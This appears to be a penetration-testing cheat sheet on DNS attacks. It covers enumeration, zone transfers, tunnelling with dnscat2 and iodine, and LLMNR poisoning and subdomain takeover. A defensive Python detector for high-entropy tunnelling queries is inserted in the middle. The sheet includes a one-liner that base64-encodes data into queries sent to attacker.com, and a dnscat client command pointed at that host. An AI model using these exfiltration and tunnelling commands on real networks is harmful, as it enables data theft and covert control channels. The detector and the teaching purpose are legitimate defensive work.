🧠 Description

DNS attacks exploit the Domain Name System protocol for various purposes including cache poisoning, DNS tunneling, subdomain takeover, and exfiltrating data through DNS queries.

🔍 DNS Enumeration

# DNS lookup
dig target.com ANY
nslookup target.com

# Zone transfer
dig axfr target.com @dns.server.com
dnsrecon -d target.com -a

# Subdomain enumeration
dnsenum target.com
dnsrecon -d target.com -t brt -D subdomains.txt

# Brute force
while read -r sub; do dig "$sub.target.com" | grep -A 2 "ANSWER SECTION"; done < wordlist.txt

💣 DNS Tunneling

# DNS tunneling with dnscat2
# Server side
apt install dnscat2
dnscat2-server example.com

# Client side
dnscat --dns server=attacker.com --secret=secret123

# Iodine (IP over DNS)
iodined -f 10.0.0.1 tunneldomain.com

# Use DNS for C2
# DNS callbacks for data exfiltration
# Encode data in DNS queries
echo "data" | base64 | while read c; do dig $c.attacker.com; done
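
Seen from the resolver side, the encoded-query pattern above shows up as one client sending many distinct, long, high-entropy subdomains under a single parent domain. The Python below is an added detection example, not part of the original cheat sheet; the log tuples are constructed, the thresholds are illustrative assumptions, and the parent domain is assumed to be the last two labels of the name.

```python
import math
from collections import Counter, defaultdict

# Constructed sample: (client_ip, queried_name) pairs, as parsed from a resolver log.
SAMPLE_QUERIES = [
    ("10.0.0.5", "www.example.org"),
    ("10.0.0.5", "mail.example.org"),
    ("10.0.0.7", "ZGF0YS1jaHVuay0wMDAxLXNlY3JldA.t.tunnel.example"),
    ("10.0.0.7", "ZGF0YS1jaHVuay0wMDAyLXNlY3JldA.t.tunnel.example"),
    ("10.0.0.7", "ZGF0YS1jaHVuay0wMDAzLXNlY3JldA.t.tunnel.example"),
    ("10.0.0.9", "aaaaaaaaaaaaaaaaaaaaaaaa.example.net"),      # long but low entropy
    ("10.0.0.9", "d3a1f09c7b2e4a6f8c1d5e7b.cdn.example.net"),  # random-looking, seen once
]

def shannon_entropy(s):
    """Shannon entropy of s in bits per character."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())

def find_tunnel_suspects(queries, min_len=20, min_entropy=3.5, min_unique=3):
    """Return {(client, parent_domain): [qnames]} for clients that sent at least
    min_unique distinct names whose subdomain part is long and high-entropy.
    Assumption: the parent domain is the last two labels (no public-suffix list).
    Thresholds are illustrative and need tuning against real traffic."""
    hits = defaultdict(set)
    for client, qname in queries:
        labels = qname.rstrip(".").split(".")
        if len(labels) < 3:
            continue
        parent = ".".join(labels[-2:]).lower()
        payload = "".join(labels[:-2])  # keep case: base64 alphabets are case-sensitive
        if len(payload) >= min_len and shannon_entropy(payload) >= min_entropy:
            hits[(client, parent)].add(qname)
    return {k: sorted(v) for k, v in hits.items() if len(v) >= min_unique}

if __name__ == "__main__":
    for (client, parent), names in find_tunnel_suspects(SAMPLE_QUERIES).items():
        print(f"{client} -> {parent}: {len(names)} suspicious names")
```

Requiring several distinct names per client and parent keeps a single hashed CDN hostname from raising an alert, while a stream of encoded chunks under one domain still does.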

🎯 DNS Hijacking

# LLMNR/NBT-NS poisoning (network level)
responder.py -I eth0 -w

# DNS cache poisoning
# Use ettercap or bettercap
bettercap -X --proxy -T target.com

# Subdomain takeover
# Find dangling DNS records
subfinder -d target.com | assetfinder --subs-only | httprobe
# Check for expired cloud resources

# Modify DNS records via compromised registrar